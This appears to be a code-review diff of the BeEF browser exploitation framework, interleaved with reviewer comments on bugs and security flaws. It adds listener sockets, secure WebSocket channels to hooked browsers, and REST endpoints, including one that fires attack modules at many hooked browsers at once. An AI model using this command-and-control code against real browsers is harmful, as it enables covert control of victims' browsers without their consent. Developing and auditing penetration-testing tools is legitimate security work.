@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
diff --git a/core/main/models/hookedbrowser.rb b/core/main/models/hookedbrowser.rb
index 0f48f00a8..13c011e04 100644
--- a/core/main/models/hookedbrowser.rb
+++ b/core/main/models/hookedbrowser.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
diff --git a/core/main/models/log.rb b/core/main/models/log.rb
index 9089c0c07..3e78c0c7f 100644
--- a/core/main/models/log.rb
+++ b/core/main/models/log.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
diff --git a/core/main/models/optioncache.rb b/core/main/models/optioncache.rb
index 74851f908..9dedec1d1 100644
--- a/core/main/models/optioncache.rb
+++ b/core/main/models/optioncache.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
diff --git a/core/main/models/result.rb b/core/main/models/result.rb
index 481069b86..50e20ed1b 100644
--- a/core/main/models/result.rb
+++ b/core/main/models/result.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
diff --git a/core/main/models/user.rb b/core/main/models/user.rb
index 34d98151e..6b5947bad 100644
--- a/core/main/models/user.rb
+++ b/core/main/models/user.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
diff --git a/core/main/network_stack/api.rb b/core/main/network_stack/api.rb
index 731853f64..1e7c5bae2 100644
--- a/core/main/network_stack/api.rb
+++ b/core/main/network_stack/api.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
diff --git a/core/main/network_stack/assethandler.rb b/core/main/network_stack/assethandler.rb
index 682fb5b14..c17c0689c 100644
--- a/core/main/network_stack/assethandler.rb
+++ b/core/main/network_stack/assethandler.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
@@ -29,6 +19,7 @@ module Handlers
 # Starts the AssetHandler instance
 def initialize
 @allocations = {}
+ @sockets = {}
 @http_server = BeEF::Core::Server.instance
 @root_dir = File.expand_path('../../../../', __FILE__)
 end
@@ -59,6 +50,60 @@ module Handlers print_info "Url [" + url + "] unmounted" end + # use it like: bind_socket("irc","0.0.0.0",6667) + def bind_socket(name, host, port) + if @sockets[name] != nil + print_error "Bind Socket [#{name}] is already listening on [#{host}:#{port}]." + else + t = Thread.new { + server = TCPServer.new(host,port) + loop do + Thread.start(server.accept) do |client| + data = "" + recv_length = 1024 + threshold = 1024 * 512 + while (tmp = client.recv(recv_length)) + data += tmp + break if tmp.length < recv_length || tmp.length == recv_length + # 512 KB max of incoming data + break if data > threshold + end + if data.size > threshold + print_error "More than 512 KB of data incoming for Bind Socket [#{name}]. For security purposes client connection is closed, and data not saved." + else + @sockets[name] = {'thread' => t, 'data' => data} + print_info "Bind Socket [#{name}] received [#{data.size}] bytes of data." + print_debug "Bind Socket [#{name}] received:\n#{data}" + end + client.close + end + end + } + print_info "Bind socket [#{name}] listening on [#{host}:#{port}]." + end + end + + def get_socket_data(name) + data = nil + if @sockets[name] != nil + data = @sockets[name]['data'] + else + print_error "Bind Socket [#{name}] does not exists." + end + data + end + + def unbind_socket(name) + t = @sockets[name]['thread'] + if t.alive? + print_debug "Thread to be killed: #{t}" + Thread.kill(t) + print_info "Bind Socket [#{name}] killed." + else + print_info "Bind Socket [#{name}] ALREADY killed." + end + end + # Builds a URL based on the path and extension, if neither are passed a random URL will be generated # @param [String] path URL Path defined by bind() # @param [String] extension Extension defined by bind() diff --git a/core/main/network_stack/handlers/dynamicreconstruction.rb b/core/main/network_stack/handlers/dynamicreconstruction.rb index f2a32fb5e..276b63780 100644 --- a/core/main/network_stack/handlers/dynamicreconstruction.rb 
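Review bot: The read loop in `bind_socket` always stops after the first `recv`, because `break if tmp.length < recv_length || tmp.length == recv_length` is true for every chunk, so at most 1024 bytes are kept and the 512 KB cap never takes effect. The next guard, `break if data > threshold`, compares a String with an Integer and would raise if it were ever reached. I would cap first with `break if data.size > threshold` and then end on a short read with `break if tmp.length < recv_length`. `@sockets[name]` is only set once a client has sent data, so until then the "already listening" check cannot detect a second bind and `unbind_socket` dereferences nil at `@sockets[name]['thread']`; a guard such as `return print_error("Bind Socket [#{name}] does not exists.") if @sockets[name].nil?` would cover the second case. `print_debug "Bind Socket [#{name}] received:\n#{data}"` also writes raw, unauthenticated network input to the console.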
+++ b/core/main/network_stack/handlers/dynamicreconstruction.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/core/main/network_stack/websocket/websocket.rb b/core/main/network_stack/websocket/websocket.rb index a24506827..a9274f5b5 100644 --- a/core/main/network_stack/websocket/websocket.rb +++ b/core/main/network_stack/websocket/websocket.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core 
@@ -27,17 +17,156 @@ module BeEF @@activeSocket= Hash.new @@lastalive= Hash.new @@config = BeEF::Core::Configuration.instance + #@@wsopt=nil MOUNTS = BeEF::Core::Server.instance.mounts def initialize - port = @@config.get("beef.http.websocket.port") + + secure = @@config.get("beef.http.websocket.secure") + @root_dir = File.expand_path('../../../../../', __FILE__) + + if (secure) + ws_secure_options = {:host => "0.0.0.0", :port => @@config.get("beef.http.websocket.secure_port"), :secure => true, + :tls_options => { + :private_key_file => @root_dir+"/"+@@config.get("beef.http.https.key"), + :cert_chain_file => @root_dir+"/"+ @@config.get("beef.http.https.cert") + } + } + # @note Start a WSS server socket + start_websocket_server(ws_secure_options, true) + end + + # @note Start a WS server socket + ws_options = {:host => "0.0.0.0", :port => @@config.get("beef.http.websocket.port")} + start_websocket_server(ws_options,false) + + # #Thread for websocket-secure + # Thread.new { + # port = @@config.get("beef.http.websocket.secure_port") + # sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets + # EventMachine.run { + # + # wsopt = {:host => "0.0.0.0", :port => port, :secure => true, + # :tls_options => { + # :private_key_file => @root_dir+"/"+@@config.get("beef.http.https.key"), + # :cert_chain_file => @root_dir+"/"+ @@config.get("beef.http.https.cert") + # } + # } + # + # + # EventMachine::WebSocket.start(wsopt) do |ws| + # begin + # print_debug "New WebSocket-secured channel open." + # ws.onmessage { |msg| + # msg_hash = JSON.parse("#{msg}") + # #@note messageHash[result] is Base64 encoded + # if (msg_hash["cookie"]!= nil) + # print_debug("WebSocket-secured - Browser says helo! 
WebSocket is running") + # #insert new connection in activesocket + # @@activeSocket["#{msg_hash["cookie"]}"] = ws + # print_debug("WebSocket-secured - activeSocket content [#{@@activeSocket}]") + # elsif msg_hash["alive"] != nil + # hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"]) + # unless hooked_browser.nil? + # hooked_browser.lastseen = Time.new.to_i + # hooked_browser.count! + # hooked_browser.save + # + # #Check if new modules need to be sent + # zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false) + # zombie_commands.each { |command| add_command_instructions(command, hooked_browser) } + # + # #@todo antisnatchor: + # #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions + # #Check if new forged requests need to be sent (Requester/TunnelingProxy) + # dhook = BeEF::Extension::Requester::API::Hook.new + # dhook.requester_run(hooked_browser, '') + # + # #Check if new XssRays scan need to be started + # xssrays = BeEF::Extension::Xssrays::API::Scan.new + # xssrays.start_scan(hooked_browser, '') + # end + # else + # #json recv is a cmd response decode and send all to + # #we have to call dynamicreconstructor handler camp must be websocket + # #print_debug("Received from WebSocket #{messageHash}") + # execute(msg_hash) + # end + # } + # rescue Exception => e + # print_error "WebSocket-secured error: #{e}" + # end + # end + # } + # + # } + # + ##Thread for websocket + #Thread.new { + # port = @@config.get("beef.http.websocket.port") + # sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets + # EventMachine.run { + # + # wsopt = {:host => "0.0.0.0", :port => port} + # + # + # EventMachine::WebSocket.start(wsopt) do |ws| + # begin + # print_debug "New WebSocket channel open." 
+ # ws.onmessage { |msg| + # msg_hash = JSON.parse("#{msg}") + # #@note messageHash[result] is Base64 encoded + # if (msg_hash["cookie"]!= nil) + # print_debug("WebSocket - Browser says helo! WebSocket is running") + # #insert new connection in activesocket + # @@activeSocket["#{msg_hash["cookie"]}"] = ws + # print_debug("WebSocket - activeSocket content [#{@@activeSocket}]") + # elsif msg_hash["alive"] != nil + # hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"]) + # unless hooked_browser.nil? + # hooked_browser.lastseen = Time.new.to_i + # hooked_browser.count! + # hooked_browser.save + # + # #Check if new modules need to be sent + # zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false) + # zombie_commands.each { |command| add_command_instructions(command, hooked_browser) } + # + # #@todo antisnatchor: + # #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions + # #Check if new forged requests need to be sent (Requester/TunnelingProxy) + # dhook = BeEF::Extension::Requester::API::Hook.new + # dhook.requester_run(hooked_browser, '') + # + # #Check if new XssRays scan need to be started + # xssrays = BeEF::Extension::Xssrays::API::Scan.new + # xssrays.start_scan(hooked_browser, '') + # end + # else + # #json recv is a cmd response decode and send all to + # #we have to call dynamicreconstructor handler camp must be websocket + # #print_debug("Received from WebSocket #{messageHash}") + # execute(msg_hash) + # end + # } + # rescue Exception => e + # print_error "WebSocket error: #{e}" + # end + # end + # } + #} + + + end + + def start_websocket_server(ws_options, secure) Thread.new { sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets - EventMachine.run { #todo antisnatchor: add support for WebSocket secure (new object with different config options, then start) - 
EventMachine::WebSocket.start(:host => "0.0.0.0", :port => port) do |ws| + EventMachine.run { + EventMachine::WebSocket.start(ws_options) do |ws| begin - print_debug "New WebSocket channel open." + secure ? print_debug("New WebSocketSecure channel open.") : print_debug("New WebSocket channel open.") ws.onmessage { |msg| msg_hash = JSON.parse("#{msg}") #@note messageHash[result] is Base64 encoded @@ -80,7 +209,6 @@ module BeEF end } } - end #@note retrieve the right websocket channel given an hooked browser session @@ -115,7 +243,7 @@ module BeEF handler = data["handler"] if handler.match(/command/) BeEF::Core::Models::Command.save_result(hooked_browser, data["cid"], - @@config.get("beef.module.#{handler.gsub("/command/", "").gsub(".js", "")}.name"), command_results) + @@config.get("beef.module.#{handler.gsub("/command/", "").gsub(".js", "")}.name"), command_results) else #processing results from extensions, call the right handler data["beefhook"] = hooked_browser data["results"] = JSON.parse(Base64.decode64(data["result"])) diff --git a/core/main/rest/api.rb b/core/main/rest/api.rb index 0f8ce0b7c..9171b2c76 100644 --- a/core/main/rest/api.rb +++ b/core/main/rest/api.rb 
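Review bot: `initialize` starts the plain WS listener unconditionally, so when `beef.http.websocket.secure` is enabled the unencrypted port stays open beside the WSS one and the hook traffic can still travel in clear text. If that is not intended, the second call should read `start_websocket_server(ws_options, false) unless secure`; if both are wanted, a comment should say so. Both option hashes hard-code `:host => "0.0.0.0"`, which exposes the listeners on every interface regardless of the configured bind address, so the value would be better read from configuration. The hunk also adds roughly a hundred lines of commented-out server code that duplicate `start_websocket_server`; these should be dropped and left to version control. `initialize` and `start_websocket_server` continue in the following hunks.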
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core @@ -29,6 +19,12 @@ module BeEF end end + module RegisterCategoriesHandler + def self.mount_handler(server) + server.mount('/api/categories', BeEF::Core::Rest::Categories.new) + end + end + module RegisterLogsHandler def self.mount_handler(server) server.mount('/api/logs', BeEF::Core::Rest::Logs.new) @@ -43,6 +39,8 @@ module BeEF BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler') BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler') + BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterCategoriesHandler, BeEF::API::Server, 'mount_handler') + BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler') BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler') diff --git a/core/main/rest/handlers/admin.rb b/core/main/rest/handlers/admin.rb index d36935bfe..6730f2d9e 100644 --- a/core/main/rest/handlers/admin.rb +++ b/core/main/rest/handlers/admin.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/main/rest/handlers/categories.rb b/core/main/rest/handlers/categories.rb new file mode 100644 index 000000000..88d5e8302 --- /dev/null +++ b/core/main/rest/handlers/categories.rb @@ -0,0 +1,39 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# + +module BeEF + module Core + module Rest + class Categories < BeEF::Core::Router::Router + + config = BeEF::Core::Configuration.instance + + before do + error 401 unless params[:token] == config.get('beef.api_token') + halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip) + headers 'Content-Type' => 'application/json; charset=UTF-8', + 'Pragma' => 'no-cache', + 'Cache-Control' => 'no-cache', + 'Expires' => '0' + end + + get '/' do + categories = BeEF::Modules::get_categories + cats = Array.new + i = 0 + # todo add sub-categories support! + categories.each do |category| + cat = {"id" => i, "name" => category} + cats << cat + i += 1 + end + cats.to_json + end + + end + end + end +end \ No newline at end of file 
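Review bot: The `before` filter in the new categories.rb checks the API token with a plain `==` (`error 401 unless params[:token] == config.get('beef.api_token')`), which is not a constant-time comparison. The token is also read from the query string, where it tends to be recorded in proxy and access logs. A constant-time check such as `error 401 unless Rack::Utils.secure_compare(config.get('beef.api_token').to_s, params[:token].to_s)` removes the timing difference. In `get '/'` the manual counter can be replaced by `categories.each_with_index.map { |name, i| {"id" => i, "name" => name} }.to_json`; note that these ids are list positions, so they change whenever the category order does.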
diff --git a/core/main/rest/handlers/hookedbrowsers.rb b/core/main/rest/handlers/hookedbrowsers.rb index 6976dda05..f3384a6ca 100644 --- a/core/main/rest/handlers/hookedbrowsers.rb +++ b/core/main/rest/handlers/hookedbrowsers.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF @@ -30,12 +20,16 @@ module BeEF 'Expires' => '0' end + # # @note Return a can of Leffe to the thirsty Bovine Security Team member. AthCon2012 joke /antisnatchor/ + # #get "/to/a/pub" # "BeER please" #end + # # @note Get online and offline hooked browsers details (like name, version, os, ip, port, ...) + # get '/' do online_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 15))) offline_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 15))) @@ -49,7 +43,9 @@ module BeEF output.to_json end + # # @note Get all the hooked browser details (plugins enabled, technologies enabled, cookies) + # get '/:session' do hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session]) error 401 unless hb != nil 
@@ -76,11 +72,12 @@ module BeEF details = BeEF::Core::Models::BrowserDetails { + 'id' => hb.id, + 'session' => hb.session, 'name' => details.get(hb.session, 'BrowserName'), 'version' => details.get(hb.session, 'BrowserVersion'), 'os' => details.get(hb.session, 'OsName'), 'platform' => details.get(hb.session, 'SystemPlatform'), - 'session' => hb.session, 'ip' => hb.ip, 'domain' => details.get(hb.session, 'HostName'), 'port' => hb.port.to_s, diff --git a/core/main/rest/handlers/logs.rb b/core/main/rest/handlers/logs.rb index 848e1fd2e..6d7d4b109 100644 --- a/core/main/rest/handlers/logs.rb +++ b/core/main/rest/handlers/logs.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF @@ -30,13 +20,17 @@ module BeEF 'Expires' => '0' end + # # @note Get all global logs + # get '/' do logs = BeEF::Core::Models::Log.all() logs_to_json(logs) end + # # @note Get hooked browser logs + # get '/:session' do hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session]) error 401 unless hb != nil diff --git a/core/main/rest/handlers/modules.rb b/core/main/rest/handlers/modules.rb index 7addcf623..44384137e 100644 --- a/core/main/rest/handlers/modules.rb +++ b/core/main/rest/handlers/modules.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF @@ -30,7 +20,9 @@ module BeEF 'Expires' => '0' end + # # @note Get all available and enabled modules (id, name, category) + # get '/' do mods = BeEF::Core::Models::CommandModule.all @@ -50,7 +42,18 @@ module BeEF mods_hash.to_json end + get '/search/:mod_name' do + mod = BeEF::Core::Models::CommandModule.first(:name => params[:mod_name]) + result = {} + if mod != nil + result = {'id' => mod.id} + end + result.to_json + end + + # # @note Get the module definition (info, options) + # get '/:mod_id' do cmd = BeEF::Core::Models::CommandModule.get(params[:mod_id]) error 404 unless cmd != nil 
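Review bot: The new `get '/search/:mod_name'` route in modules.rb has no `@note` comment, although this commit adds `#`-framed notes to the routes around it. Something like `# @note Look up a module by exact name; returns {"id": N} or {} when no module matches` would document the contract. It also answers an unknown name with `{}` and status 200, while `get '/:mod_id'` just below uses `error 404 unless cmd != nil`; if that difference is intended it belongs in the note, otherwise `error 404 unless mod != nil` keeps the two lookups consistent.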
@@ -76,20 +79,29 @@ module BeEF #Content-Type: application/json; charset=UTF-8 # #{"date":"1331637093","data":"{\"data\":\"text=michele\"}"} + # get '/:session/:mod_id/:cmd_id' do hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session]) error 401 unless hb != nil cmd = BeEF::Core::Models::Command.first(:hooked_browser_id => hb.id, :command_module_id => params[:mod_id], :id => params[:cmd_id]) error 404 unless cmd != nil - result = BeEF::Core::Models::Result.first(:hooked_browser_id => hb.id, :command_id => cmd.id) - error 404 unless result != nil - { - 'date' => result.date, - 'data' => result.data - }.to_json + results = BeEF::Core::Models::Result.all(:hooked_browser_id => hb.id, :command_id => cmd.id) + error 404 unless results != nil + + results_hash = {} + i = 0 + results.each do |result| + results_hash[i] = { + 'date' => result.date, + 'data' => result.data + } + i+=1 + end + results_hash.to_json end + # # @note Fire a new command module to the specified hooked browser. # Return the command_id of the executed module if it has been fired correctly. # Input must be specified in JSON format @@ -123,6 +135,7 @@ module BeEF #Content-Length: 35 # #{"success":"true","command_id":"not_available"} + # post '/:session/:mod_id' do hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session]) error 401 unless hb != nil 
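Review bot: `error 404 unless results != nil` can no longer fire after the switch from `Result.first` to `Result.all`. Assuming these are DataMapper models (the `:lastseen.gte` query syntax elsewhere in the commit suggests so), `all` returns a collection that may be empty but is never nil, so a command with no stored result now yields `{}` with status 200. If the 404 is still wanted, test for emptiness: `error 404 if results.empty?`. The response also changes from a single `{date, data}` object to an object keyed by index, which breaks existing API clients; a JSON array, `results.map { |r| {'date' => r.date, 'data' => r.data} }.to_json`, would express the list directly. The route's example comment begins above the hunk.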
@@ -141,6 +154,122 @@ module BeEF error 400 # Bad Request end end + + # + #@note Fire a new command module to multiple hooked browsers. + # Returns the command IDs of the launched module, or 0 if firing got issues. + # + # POST request body example (for modules that don't need parameters, just remove "mod_params") + # { + # "mod_id":1, + # "mod_params":{ + # "question":"are you hooked?" + # }, + # "hb_ids":[1,2] + # } + # + # response example: {"1":16,"2":17} + # + # curl example (alert module with custom text, 2 hooked browsers)): + # + #curl -H "Content-Type: application/json; charset=UTF-8" -d '{"mod_id":110,"mod_params":{"text":"mucci?"},"hb_ids":[1,2]}' + #-X POST http://127.0.0.1:3000/api/modules/multi?token=2316d82702b83a293e2d46a0886a003a6be0a633 + # + post '/multi_browser' do + request.body.rewind + begin + body = JSON.parse request.body.read + + modk = BeEF::Module.get_key_by_database_id body["mod_id"] + error 404 unless modk != nil + mod_params = [] + + if body["mod_params"] != nil + body["mod_params"].each{|k,v| + mod_params.push({'name' => k, 'value' => v}) + } + end + + hb_ids = body["hb_ids"] + results = Hash.new + hb_ids.each do |hb_id| + hb = BeEF::Core::Models::HookedBrowser.first(:id => hb_id) + if hb == nil + results[hb_id] = 0 + next + else + cmd_id = BeEF::Module.execute(modk, hb.session, mod_params) + results[hb_id] = cmd_id + end + end + results.to_json + rescue Exception => e + print_error "Invalid JSON input passed to endpoint /api/modules/multi" + error 400 # Bad Request + end + end + + # @note Fire multiple command modules to a single hooked browser. + # Returns the command IDs of the launched modules, or 0 if firing got issues. 
